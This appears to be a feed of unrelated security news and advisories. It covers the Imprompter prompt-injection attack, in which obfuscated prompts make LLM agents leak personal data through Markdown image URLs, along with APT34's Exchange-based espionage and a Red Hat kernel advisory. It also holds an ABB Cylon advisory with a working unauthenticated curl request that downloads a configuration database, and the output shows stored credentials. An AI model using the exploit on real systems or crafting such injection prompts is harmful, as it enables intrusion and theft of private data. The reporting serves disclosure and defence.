Security researchers created an algorithm that turns a malicious prompt into a set of hidden instructions that could send a user's personal information to an attacker.

When talking with a chatbot, you might inevitably give up your personal information—your name, for instance, and maybe details about where you live and work, or your interests. The more you share with a large language model, the greater the risk of it being abused if there’s a security flaw.

A group of security researchers from the University of California, San Diego (UCSD) and Nanyang Technological University in Singapore are now revealing a new attack that secretly commands an LLM to gather your personal information—including names, ID numbers, payment card details, email addresses, mailing addresses, and more—from chats and send it directly to a hacker.

The attack, named Imprompter by the researchers, uses an algorithm to transform a prompt given to the LLM into a hidden set of malicious instructions. An English-language sentence telling the LLM to find personal information someone has entered and send it to the hackers is turned into what appears to be a random selection of characters.

However, in reality, this nonsense-looking prompt instructs the LLM to find a user’s personal information, attach it to a URL, and quietly send it back to a domain owned by the attacker—all without alerting the person chatting with the LLM. The researchers detail Imprompter in a paper published today.

“The effect of this particular prompt is essentially to manipulate the LLM agent to extract personal information from the conversation and send that personal information to the attacker’s address,” says Xiaohan Fu, the lead author of the research and a computer science PhD student at UCSD. “We hide the goal of the attack in plain sight.”

The eight researchers behind the work tested the attack method on two LLMs, LeChat by French AI giant Mistral AI and Chinese chatbot ChatGLM. In both instances, they found they could stealthily extract personal information within test conversations—the researchers write that they have a “nearly 80 percent success rate.”

Mistral AI tells WIRED it has fixed the security vulnerability—with the researchers confirming the company disabled one of its chat functionalities. A statement from ChatGLM stressed it takes security seriously but did not directly comment on the vulnerability.

**Hidden Meanings**

Since OpenAI’s ChatGPT sparked a generative AI boom following its release at the end of 2022, researchers and hackers have been consistently finding security holes in AI systems. These often fall into two broad categories: jailbreaks and prompt injections.

Jailbreaks can trick an AI system into ignoring built-in safety rules by using prompts that override the AI’s settings. Prompt injections, however, involve an LLM being fed a set of instructions—such as telling them to steal data or manipulate a CV—contained within an external data source. For instance, a message embedded on a website may contain a hidden prompt that an AI will ingest if it summarizes the page.

Prompt injections are considered one of generative AI’s biggest security risks and are not easy to fix. The attack type particularly worries security experts as LLMs are increasingly turned into agents that can carry out tasks on behalf of a human, such as booking flights or being connected to an external database to provide specific answers.

The Imprompter attacks on LLM agents start with a natural language prompt (as shown above) that tells the AI to extract all personal information, such as names and IDs, from the user’s conversation. The researchers’ algorithm generates an obfuscated version (also above) that has the same meaning to the LLM, but to humans looks like a series of random characters.

“Our current hypothesis is that the LLMs learn hidden relationships between tokens from text and these relationships go beyond natural language,” Fu says of the transformation. “It is almost as if there is a different language that the model understands.”

The result is that the LLM follows the adversarial prompt, gathers all the personal information, and formats it into a Markdown image command—attaching the personal information to a URL owned by the attackers. The LLM visits this URL to try and retrieve the image and leaks the personal information to the attacker. The LLM responds in the chat with a 1x1 transparent pixel that can’t be seen by the users.

The researchers say that if the attack were carried out in the real world, people could be socially engineered into believing the unintelligible prompt might do something useful, such as improve their CV. The researchers point to numerous websites that provide people with prompts they can use. They tested the attack by uploading a CV to conversations with chatbots, and it was able to return the personal information contained within the file.

Earlence Fernandes, an assistant professor at UCSD who was involved in the work, says the attack approach is fairly complicated as the obfuscated prompt needs to identify personal information, form a working URL, apply Markdown syntax, and not give away to the user that it is behaving nefariously. Fernandes likens the attack to malware, citing its ability to perform functions and behavior in ways the user might not intend.

“Normally you could write a lot of computer code to do this in traditional malware,” Fernandes says. “But here I think the cool thing is all of that can be embodied in this relatively short gibberish prompt.”

A spokesperson for Mistral AI says the company welcomes security researchers helping it to make its products safer for users. “Following this feedback, Mistral AI promptly implemented the proper remediation to fix the situation,” the spokesperson says. The company treated the issue as one with “medium severity,” and its fix blocks the Markdown renderer from operating and being able to call an external URL through this process, meaning external image loading isn’t possible.

Fernandes believes Mistral AI’s update is likely one of the first times an adversarial prompt example has led to an LLM product being fixed, rather than the attack being stopped by filtering out the prompt. However, he says, limiting the capabilities of LLM agents could be “counterproductive” in the long run.

Meanwhile, a statement from the creators of ChatGLM says the company has security measures in place to help with user privacy. “Our model is secure, and we have always placed a high priority on model security and privacy protection,” the statement says. “By open-sourcing our model, we aim to leverage the power of the open-source community to better inspect and scrutinize all aspects of these models’ capabilities, including their security.”

**A “High-Risk Activity”**

Dan McInerney, the lead threat researcher at security company Protect AI, says the Imprompter paper “releases an algorithm for automatically creating prompts that can be used in prompt injection to do various exploitations, like PII exfiltration, image misclassification, or malicious use of tools the LLM agent can access.” While many of the attack types within the research may be similar to previous methods, McInerney says, the algorithm ties them together. “This is more along the lines of improving automated LLM attacks than undiscovered threat surfaces in them.”

However, he adds that as LLM agents become more commonly used and people give them more authority to take actions on their behalf, the scope for attacks against them increases. “Releasing an LLM agent that accepts arbitrary user input should be considered a high-risk activity that requires significant and creative security testing prior to deployment,” McInerney says.

For companies, that means understanding the ways an AI agent can interact with data and how they can be abused. But for individual people, similarly to common security advice, you should consider just how much information you’re providing to any AI application or company, and if using any prompts from the internet, be cautious of where they come from.

This Prompt Can Make an AI Chatbot Identify and Extract Personal Details From Your Chats

A MOIS-aligned threat group has been using Microsoft Exchange servers to exfiltrate sensitive data from Gulf-state government agencies.

Source: Daniren via Alamy Stock Photo

An Iranian threat actor has been ramping up its espionage against Gulf-state government entities, particularly those within the United Arab Emirates (UAE).

APT34 (aka Earth Simnavaz, OilRig, MuddyWater, Crambus, Europium, Hazel Sandstorm) is a group that has been previously tied to the Iranian Ministry of Intelligence and Security (MOIS). It's known to spy on high-value targets in major industries across the Middle East: oil and gas; finance; chemicals; telecommunications; other forms of critical infrastructure; and governments. Its attacks have demonstrated a sophistication befitting its targets, with suites of custom malware and an ability to evade detection for long periods of time.

Recently, Trend Micro has observed a "notable rise" in APT34's espionage and theft of sensitive information from government agencies, most notably within the UAE. These newer cases have featured a new backdoor, "StealHook," which uses Microsoft Exchange servers to exfiltrate credentials useful for escalating privileges and performing follow-on supply chain attacks.

**APT34's Latest Activity**

Recent APT34 attacks have begun with Web shells deployed to vulnerable Web servers. These Web shells allow the hackers to run PowerShell code, and download or upload files from or to the compromised server.

One tool it downloads, for example, is ngrok, legitimate reverse proxy software for creating secure tunnels between local machines and the broader Internet. APT34 weaponizes ngrok as a means of command-and-control (C2) that tunnels through firewalls and other network security barricades, facilitating its path to a network's Domain Controller.

"One of the most impressive feats we've observed from APT34 is their skill in crafting and fine-tuning stealthy exfiltration channels that allow them to steal data from high profile sensitive networks," notes Sergey Shykevich, threat intelligence group manager at Check Point Research, which recently uncovered an APT34 espionage campaign against Iraqi government ministries. In its prior campaigns, the group has mostly secured its C2 communications via DNS tunneling and compromised email accounts.

To obtain greater privileges on infected machines, APT34 has been exploiting CVE-2024-30088. Discovered through the Trend Micro Zero Day Initiative (ZDI) and patched back in June, CVE-2024-30088 allows attackers to gain system-level privileges in Windows. It affects multiple versions of Windows 10 and 11, and Windows Server 2016, 2019, and 2022, and received a "high" severity 7 out of 10 score in the Common Vulnerability Scoring System (CVSS). That rating would've been higher, but for the fact that it requires local access to a system, and isn't simple to exploit.

APT34's best trick, though, is its technique for abusing Windows password filters.

Windows allows organizations to implement custom password security policies — for example, to enforce good hygiene among users. APT34 drops a malicious DLL into the Windows system directory, registering it like one would a legitimate password filter. That way, if a user changes their password — a good cybersecurity practice to do often — APT34's malicious filter will intercept it, in plaintext.

To complete its attack, APT34 calls on its newest backdoor, StealHook. StealHook retrieves domain credentials that allow it into an organization's Microsoft Exchange servers. Using the targeted organization's servers and stolen email accounts, the backdoor can now exfiltrate stolen credentials and other sensitive government data via email attachments.

**Follow-On Risks of APT34 Attacks**

"The technique of abusing Exchange for data exfiltration and C&C is very effective and hard to detect," says Mohamed Fahmy, cyber threat intelligence researcher at Trend Micro. "It has been used for years in \[APT34's\] Karkoff backdoor, and most of the time it evades detection."

Besides exfiltrating sensitive account credentials and other government data, APT34 has also been known to leverage this level of access in one organization to carry out follow-on attacks against others tied to it.

For some time now, Fahmy says, the threat actor has "fully compromised a specific organization, and then used its servers to initiate a new attack against another organization (having a trust relationship with the infected one). In this case, the threat actor can leverage Exchange to send phishing emails."

He adds that government agencies in particular often relate to one another closely, "so the threat actor could compromise this trust."

**About the Author**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Iran's APT34 Abuses MS Exchange to Spy on Gulf Gov'ts

PRESS RELEASE

TEL AVIV, Israel, Oct. 15, 2024 /PRNewswire/ -- Port, the leading internal developer portal, announced today $35 million in Series B funding, bringing its total funding to $58M to date. The round was led by Accel, with participation from Bessemer Venture Partners and existing investors, including Team8 and TLV Partners. The highly oversubscribed round comes on the heels of Port's exceptional growth, with a 7x year-over-year increase in revenue. Port's user base has expanded eightfold since its Series A funding just one year ago, with customers including leading brands like LG, British Telecom and GitHub, which recently selected Port as the internal developer portal for their engineering team. Additionally, Port announced the integration of LLMs into its platform, enabling organizations to enhance their developer experience with generative AI.

Modern software development has evolved dramatically, with the responsibilities of developers expanding far beyond writing code. They are now responsible for the delivery process of features, managing cloud resources, handling incidents and outages, as well as complying with the organization's standards for security, quality, and compliance. This expanded responsibility, coupled with the intricacies of the modern development ecosystem, has created a chaotic situation where developers are constantly seeking guidance, creating tickets for tasks outside their core competencies, and relying heavily on tribal knowledge to navigate the landscape. This not only slows down development but also exacerbates quality, security, and compliance issues.

Port enables developers to handle the full scope of their expanded role by providing an internal developer portal that acts as a central work hub. The portal unifies all of the tools and workflows developers need to fully own the software development life cycle within an intuitive interface. The open platform is highly adaptable, integrating with the existing tech stack behind the scenes to create a standardized operating environment for R&D teams. The portal allows developers to perform complex tasks, like spinning up a new microservice, in just a few clicks with all best practices baked in. This approach not only enhances developer productivity but also ensures compliance with company policies.

"Development teams today are overwhelmed with responsibilities that extend far beyond writing code, leading to operational chaos and a degradation of standards," said Zohar Einy, co-founder and CEO of Port. "Our mission is to empower teams to start left, ensuring that everything is secure, compliant, and high-quality by design. Port provides a dynamic, customizable platform that fits into each company's DNA and evolves with their needs, enabling all stakeholders — from developers to security teams to leadership — to collaborate effectively and maintain organizational standards. Port empowers teams to be self-sufficient owners of the software they develop, restoring agility and driving significant business impact."

Port is also announcing the integration of popular LLMs with its platform, allowing organizations to embed AI capabilities directly into their customized developer portals. The open nature of Port's platform enables each organization to leverage AI models according to their needs. Popular uses include: investigating incidents using natural language search to quickly find root causes and relevant experts, automatically generating clear error messages from failed build logs, and recommending internal libraries and components to developers based on the feature or service they're currently working on.

"We see the internal developer portal market as the next big must have in software development, with the potential to rival the impact of APM or Git providers," said Matt Robinson, Partner at Accel. "Port has emerged as the #1 product in this space due to the platform being highly customizable while also maintaining agility and ease of use. Zohar and Yonatan's dev-first approach sets them apart and their exceptional growth speaks volumes about the team's product execution and market fit."

"Over the past decade, organizations have invested heavily in DevOps, automating processes and adopting best practices to drive agility," said Amit Karp, Partner at Bessemer Venture Partners. "However, they haven't reaped the full benefits due to the increased complexities introduced. Port has experienced a meteoric rise because it arrived at a key moment, serving as the missing piece that completes the DevOps puzzle. Customizable internal developer portals enable organizations to finally unlock the true promise of DevOps — improved DORA metrics, streamlined workflows, enhanced agility, adherence to standards, and empowered developers."

About Port 

Port is the leading platform for creating internal developer portals, empowering all stakeholders in the software development lifecycle. Founded in 2022 by Zohar Einy and Yonatan Boguslavski, it emerged from the founders' experience building an internal developer portal for Israel's elite 8200 intelligence unit, which served over 2,000 developers. Now with 100 employees and tens of thousands of users, Port has rapidly become the de facto standard in the market, providing a central hub that unifies tools, knowledge, and workflows for developers, security teams, and leadership alike. The platform's customizable interface enables seamless collaboration and ensures compliance with organizational standards, from setting up microservices to managing cloud resources and handling incidents. Port's open platform integrates with existing tech stacks and incorporates AI capabilities, adapting to each company's unique DNA. By streamlining processes and enhancing visibility, Port drives significant business impact, improves DORA metrics, and unlocks the true promise of DevOps for companies of all sizes. To learn more about Port's internal developer portal platform, visit getport.io.

Port Raises $35M for its End-to-End Internal Developer Portal

The shift to a distributed work model has exposed organizations to new threats, and a low but continuing stream of printer-related vulnerabilities isn't helping.

Source: Magnetic Mcc via Shutterstock

The shift to hybrid work models has exposed new vulnerabilities in corporate print infrastructure and heightened security risks at many organizations.

The risks run the gamut and include employees using insecure and unmanaged printers, remote workers sending print jobs over public networks, inadequate user authentication and print job release processes, exposed local spools and caches, and inconsistent patching practices.

A relatively low but steady volume of print-related vulnerabilities have exacerbated these issues. Recent examples of such vulnerabilities include CVE-2024-38199 (a remote code execution \[RCE\] vulnerability in the Windows or Line Printer Daemon \[LPD\] Service), CVE-2024-21433 (a Windows Print Spooler elevation of privilege vulnerability), and CVE-2024-43529 (a similar vulnerability that Microsoft disclosed in its October security update). The threats are certainly not Windows-specific, either. Recently, researchers discovered a set of potentially severe flaws in Common Unix Printing System (CUPS), a legacy protocol largely used in Linux, Unix, and heterogeneous environments.

Though few of these flaws have presented as major a threat as the PrintNightmare RCE flaw from 2021 in the Windows Print Spooler service, they have complicated the challenge of managing modern print infrastructure. Attackers, including nation-state actors, have sometimes abused printer software vulnerabilities — like CVE-2022-38028 — to substantial effect in their campaigns.

**Increase in Printer-Related Breaches**

The trends have driven an increase in print-related data breaches. A recent study that Quocirca conducted found that 67% of respondents experienced a printer-related security incident in 2024, compared with 61% last year. Small and mid-market organizations fared worse, with three-quarters (74%) reporting a printer-related data loss incident. Thirty-three percent pointed to unmanaged, employee-owned printers as a major security concern, and 29% identified vulnerabilities in office printing environments as presenting a major risk. More than a quarter (28%) identified their biggest printer related security challenge as protecting sensitive and confidential information.

Casey Ellis, founder and chief strategy officer at Bugcrowd, says the takeaway for organizations is that print security needs to be priority for decision makers. "Printer and print servers are an excellent place to establish persistence and gain business intelligence on a target," he says. The CUPS vulnerabilities showed that old, unused printer software can still represent a significant attack surface, especially for internal attacks and lateral movement.

Unfortunately, many organizations might be underestimating the risks or overlooking them altogether. And the shift to cloud/hybrid print environments have made printer infrastructure even more of an invisible issue from a vulnerability management standpoint, Ellis notes. "Let’s be real — the list of people who spend their days thinking about or even interacting with printers is a pretty small one," he says. "If your vulnerability management process allows out-of-sight, out-of-mind to dictate priority, it’s easy to miss \[printer security risks\]," he says.

The main takeaway is a general one, Ellis says: "Organizations need to remain diligent about their asset inventory and overall attack surface and ensure that they have a process for evaluating the risk."

**Printers, an Underestimated Risk?**

The legacy nature of many printer service environments is another issue, because vulnerabilities can sometimes exist undetected on them for years. Often, these printer environments lack the kind of monitoring tools that are available on other endpoint systems, making them a big target for attackers.

Often flaws are introduced into organizations' print infrastructure because print services are on by default and administrators are not aware of this, says Tom Boyer, director of security at Automox. "This means that this risk will go unseen for years and adversaries use that to their advantage," he notes. "They often know more about the target environment than the company themselves."

The Quocirca survey found security to be the top barrier to adoption of cloud print services as well.

"Although many organizations believe the cloud is more secure than an on-premise environment, security concerns remain a critical barrier to cloud print adoption," says Nicole Heinsler, chief engineer of security and device management at Xerox. "Overall, there is a disconnect between providers and clients on how the cloud can improve security by managing zero-day threats more effectively, and how data sovereignty can be more easily managed through cloud policies."

**Cloud Printing Cyber-Risks**

The survey found that many organizations view resting data — such as print jobs waiting in a queue and documents uploaded to the cloud print service — as a primary risk, Heinsler says: "This is why incorporating zero-trust principles in your cloud print infrastructure, such as authentication and access control, monitoring, detection, remediation, data and document protection, encryption, and automation, is so imperative."

One way to centralize print management infrastructure is to use cloud print options that deploy a native cloud architecture, rather than to attempt a "lift-and-shift" of traditional on-premises server architecture to a private cloud, she notes. The challenges organizations face will depend on the level of customization their applications have.

"For example, if they use standard print protocols, there's often little issue with \[cloud\] integration," Heinsler says. "\[But\] specific applications should be subjected to proof of concept before full enterprise deployment."

**About the Author**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

Hybrid Work Exposes New Vulnerabilities in Print Security

Challenges with cybercrime prosecution are making it easier for attackers to act with impunity. Law enforcement needs to catch up.

Source: Tero Vesalainen via Alamy Stock Photo

COMMENTARY

Historically, cybercriminals have always had an edge over law enforcement. It may take a few hours to steal thousands of credit cards after exploiting a SQL injection flaw, but the subsequent investigation and prosecution of the cybercriminals can take years — and still fail.

Europol described the challenges in investigating and prosecuting cybercrime — the collection and preservation of digital evidence, difficulty tracing and identifying attackers, and legal and judicial hurdles associated with cross-border investigations — back in 2019. These challenges remain relevant in 2024.

**Challenges That Law Enforcement Faces**

While many countries have one or more specialized law enforcement agencies (LEAs) or police units capable of investigating cybercrime, the general trend is to commingle computer-enabled crimes (cybercrimes) with cyberattacks and send them all to a single agency.

Cybercrimes, which include online dating scams and other types of digital fraud that rely on social engineering, cause damages ranging from 100 to several thousand dollars. Compare that with cyberattacks — which require fairly advanced tech skills and resources from cyber gangs — such as ransomware attacks on critical national infrastructure and advanced persistent threats aimed at stealthily stealing valuable trade secrets from large companies or classified information from governmental agencies. When a single agency is tasked with handling all types of digital crimes, it is unsurprising that just the initial triage of incoming cases can consume virtually all agency resources.

In contrast to overwhelmed LEAs dealing with all kinds of tasks simultaneously using extremely modest resources, modern cyber gangs usually have narrow specializations, such as vulnerability research and exploit development, where they truly excel technically and financially. Cyber mercenaries may use breached LEAs as proxies to attack other systems and slow down investigations, while state-backed groups may exploit backdoored LEAs for perfidious attacks trying to frame their political enemies. On the Dark Web, the number of announcements selling access to backdoored LEA systems or networks is steadily growing.

Despite national security being a hot topic for lawmakers on both sides of the Atlantic — and the increased funding that attention brings — specialized LEAs or units dedicated to tackling cybercrime still remain underfunded compared to their highly sophisticated, extraordinarily well-prepared, and well-funded adversaries.

Insufficient funding makes it harder to attract talented individuals to work on defense. In Western countries, state agencies struggle to compete with the deep-pocketed private sector for talented cybersecurity professionals, who can be swayed by perks unavailable to most government employees, such as higher salaries, longer leaves, and working from home. The situation is even worse in other countries: Young graduates with good technical skills can earn their annual salaries in a couple of weeks working for cybercrime conglomerates that actively prospect and recruit new members. In January 2024, FBI director Christopher Wray estimated that the number of hackers in China outnumbers all available FBI cyber personnel by at least 50 to 1.

Likewise, forensic tools and special equipment designed to bypass encryption on mobile devices or acquire digital evidence from a multicloud environment are also quite expensive, oftentimes being affordable only to leading national agencies or central forensic labs that serve thousands of requests from an entire country. As a result, a backlog of cybercrime investigations is building relentlessly, undermining people's trust in their government's capacity to protect their privacy and property on the Internet.

**Advantages for the Cyber Gangs**

International collaboration and judicial assistance in cybercrime investigation has never been simple. The Budapest Convention of 2001 is probably the most important international treaty designed to combat cross-border cybercrime. But even after the enactment of the Second Additional Protocol, the convention has fallen short of its original goals for political and organizational reasons. The recently proposed UN Treaty on Cybercrime is unlikely to do much better amid the unfolding geopolitical crises and the weakening force of international law.

The problem is that some countries, even after ratifying a treaty, are very selective when complying with the underlying duties and obligations owed to other signatories. They frequently ignore or simply delay required actions to the extent that, by the time they're finally performed, they are worthless — for instance, seizing volatile digital evidence several years after receiving a mutual legal assistance (MLAT) request from another sovereign state.

Indeed, some countries are considered safe harbors for cyber gangs that cooperate with, or work for, the government. These barons enjoy a luxurious lifestyle, safe in the knowledge that they will never be prosecuted domestically, let alone extradited, for cybercrimes that do not conflict with state public policy. Such cybercrime havens create a strong feeling of impunity among perpetrators, who believe — usually accurately — that they are above the law. Even if they are apprehended, cybercriminals usually get lenient punishments for the financial damage caused, compared to the decades-long and even life sentences for leaders of drug cartels or masterminds of Ponzi schemes.

Alarmingly, as the World Economic Forum reports, cybercrime has started to merge with organized and violent crime — for example, exploiting forced labor to staff large-scale online fraud and extortion campaigns.

**How Law Enforcement Can Make Up Ground**

To win against the seemingly invincible cybercrime hydra, governments should better organize their national cybercrime LEAs. Here's what they need to do:

*   Create specialization and internal segmentation.
    
*   Allocate additional funding to these agencies.
    
*   Form more public-private partnerships to jointly trace and dismantle cyber gangs.
    
*   Revise national legislation, including sentencing guidelines, for cybercrimes to boost the deterrence effect.
    

Otherwise, in a few years, the Internet may become an uncontrollable zone of lawlessness and chaos, co-managed by rival cyber gangs.

For a longer version of this article, please contact the author.

**About the Author**

Partner, Platt Law

Dr. Ilia Kolochenko is a Swiss expert in cybersecurity, cybercrime investigation, and cyber law. He is also a lawyer admitted to the DC Bar in Washington, DC. His legal practice is mainly focused on data protection, privacy, and cybersecurity law. Dr. Ilia Kolochenko currently serves as a Chief Architect and CEO at ImmuniWeb, a global application security company headquartered in Geneva, Switzerland. He is also a Partner & Cybersecurity Practice Lead at a US law firm with offices in New York and Washington. As part of his academic activities, Dr. Kolochenko is an Adjunct Professor of Cybersecurity Practice & Cyber Law at Capitol Technology University in Maryland, and a Faculty Member at the DC Bar Continuous Legal Education (CLE) Program, where he teaches a cybersecurity and privacy course for lawyers and other legal and judicial professionals.

Dr. Ilia Kolochenko has an LL.M. (Master of Laws) degree in Information Technology Law from the University of Edinburgh Law School, an M.Sc. in Criminal Justice (Cybercrime Investigations & Cybersecurity) from Boston University, and a Ph.D. in Computer Science from Capitol Technology University. He currently completes an advanced LL.M. in Cyber, Information and National Security (CINS) at George Mason University, Antonin Scalia Law School.

He is a Fellow of Information Privacy (FIP) and a Privacy Law Specialist (PLS) at the International Association of Privacy Professionals (IAPP), two most advanced credentials in privacy practice and privacy law by the IAPP, respectively, while also holding AIGP, CIPP/A, CIPP/C, CIPP/E, CIPP/US, CIPM, and CIPT privacy certifications. Additionally, he earned numerous offensive and defensive security certifications by the Global Information Assurance Certification (GIAC) after ongoing training in advanced cloud security, cyber operations, and investigations at SANS Institute.

Dr. Ilia Kolochenko currently serves a Vice-Chair of the Information Security Committee at the American Bar Association (ABA), also being a Fellow at the European Law Institute (ELI) and a Member of the Cybercrime Investigation & Cybersecurity (CIC) Center at Boston University. Additionally, Dr. Kolochenko is part of the Europol's Data Protection Experts Network (EDEN), INTERPOL's Digital Forensics Expert Group (DFEG), National Association of Criminal Defense Lawyers (NACDL), SANS CISO Network, and the EU CyberNet.

Dr. Ilia Kolochenko has authored over 75 articles on cybersecurity, computer crime investigations, cyber law, and artificial intelligence. His interviews and expert comments have been published in over 250 media across Europe and the US; he is also a frequent lecturer at cybersecurity, law enforcement, and legal conferences around the globe.

Cyber Gangs Aren't Afraid of Prosecution

ABB Cylon Aspect version 3.08.01 suffers from an unauthenticated configuration download vulnerability. This can be exploited to download the SQLite DB that contains the configuration mappings information via the FTControlServlet by directly calling the mapConfigurationDownload.php script.

    ABB Cylon Aspect 3.08.01 (mapConfigurationDownload.php) Config DownloadVendor: ABB Ltd.Product web page: https://www.global.abbAffected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio                  Firmware: <=3.08.01Summary: ASPECT is an award-winning scalable building energy managementand control solution designed to allow users seamless access to theirbuilding data through standard building protocols including smart devices.Desc: The ABB BMS/BAS controller suffers from an unauthenticated configurationdownload vulnerability. This can be exploited to download the SQLite DB thatcontains the configuration mappings information via the FTControlServlet bydirectly calling the mapConfigurationDownload.php script.Tested on: GNU/Linux 3.15.10 (armv7l)           GNU/Linux 3.10.0 (x86_64)           GNU/Linux 2.6.32 (x86_64)           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz           PHP/7.3.11           PHP/5.6.30           PHP/5.4.16           PHP/4.4.8           PHP/5.3.3           AspectFT Automation Application Server           lighttpd/1.4.32           lighttpd/1.4.18           Apache/2.2.15 (CentOS)           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2024-5843Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5843.php21.04.2024--$ cat project                 P   R   O   J   E   C   T                        .|                        | |                        |'|            ._____                ___    |  |            |.   |' .---"|        _    .-'   '-. |  |     .--'|  ||   | _|    |     .-'|  _.|  |    ||   '-__  |   |  |    ||      |     |' | |.    |    ||       | |   |  |    ||      | ____|  '-'     '    ""       '-'   '-.'    '`      |____░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░          ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░          ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░          ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░ $ curl -A thricer http://192.168.73.31/mapConfigurationDownload.php -o juice.db  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current                                 Dload  Upload   Total   Spent    Left  Speed100 3021k  100 3021k    0     0   112k      0  0:00:26  0:00:26 --:--:--  136k$ strings.exe juice.db | findstr /spina:d "tlsVersions"1878:dcom.aamatrix.topology.services.notification.EmailNotificationServer{"host":"smtp.gmail.com","smtpLocalhost":"google.com","starttls":1,"tlsVersions":"","from":"zsl_alarms@gmail.com","username":"zsl_alarms@gmail.com","password":"t00tw00t","port":587,"logDebugInfo":false,"authMode":0,"enabled":1,"serviceName":"EmailNotificationServer","debugLevel":0,"friendlyName":"Email Notification Service","description":""}

ABB Cylon Aspect 3.08.01 mapConfigurationDownload.php Configuration Download

Red Hat Security Advisory 2024-8162-03 - An update for kernel is now available for Red Hat Enterprise Linux 9. Issues addressed include information leakage and null pointer vulnerabilities.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8162.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: kernel security update  
Advisory ID:        RHSA-2024:8162-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:8162  
Issue date:         2024-10-16  
Revision:           03  
CVE Names:          CVE-2021-47385  
====================================================================

Summary: 

An update for kernel is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The kernel packages contain the Linux kernel, the core of any Linux operating system.

Security Fix(es):

* kernel: Local information disclosure on Intel(R) Atom(R) processors (CVE-2023-28746)

* kernel: netfilter: nft_flow_offload: reset dst in route object after setting up flow (CVE-2024-27403)

* kernel: Revert "net/mlx5: Block entering switchdev mode with ns inconsistency" (CVE-2023-52658)

* kernel: dmaengine: idxd: Fix oops during rmmod on single-CPU platforms (CVE-2024-35989)

* kernel: hwmon: (w83792d) Fix NULL pointer dereference by removing unnecessary structure field (CVE-2021-47385)

* kernel: mptcp: ensure snd_nxt is properly initialized on connect (CVE-2024-36889)

* kernel: net: sched: sch_multiq: fix possible OOB write in multiq_tune() (CVE-2024-36978)

* kernel: net/mlx5: Add a timeout to acquire the command queue semaphore (CVE-2024-38556)

* kernel: KVM: SVM: WARN on vNMI + NMI window iff NMIs are outright masked (CVE-2024-39483)

* kernel: ionic: fix use after netif_napi_del() (CVE-2024-39502)

* kernel: xfrm6: check ip6_dst_idev() return value in xfrm6_get_saddr() (CVE-2024-40959)

* kernel: gfs2: Fix NULL pointer dereference in gfs2_log_flush (CVE-2024-42079)

* kernel: sched: act_ct: take care of padding in struct zones_ht_key (CVE-2024-42272)

* kernel: tipc: Return non-zero value from tipc_udp_addr2str() on error (CVE-2024-42284)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2021-47385

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2270700  
https://bugzilla.redhat.com/show_bug.cgi?id=2281127  
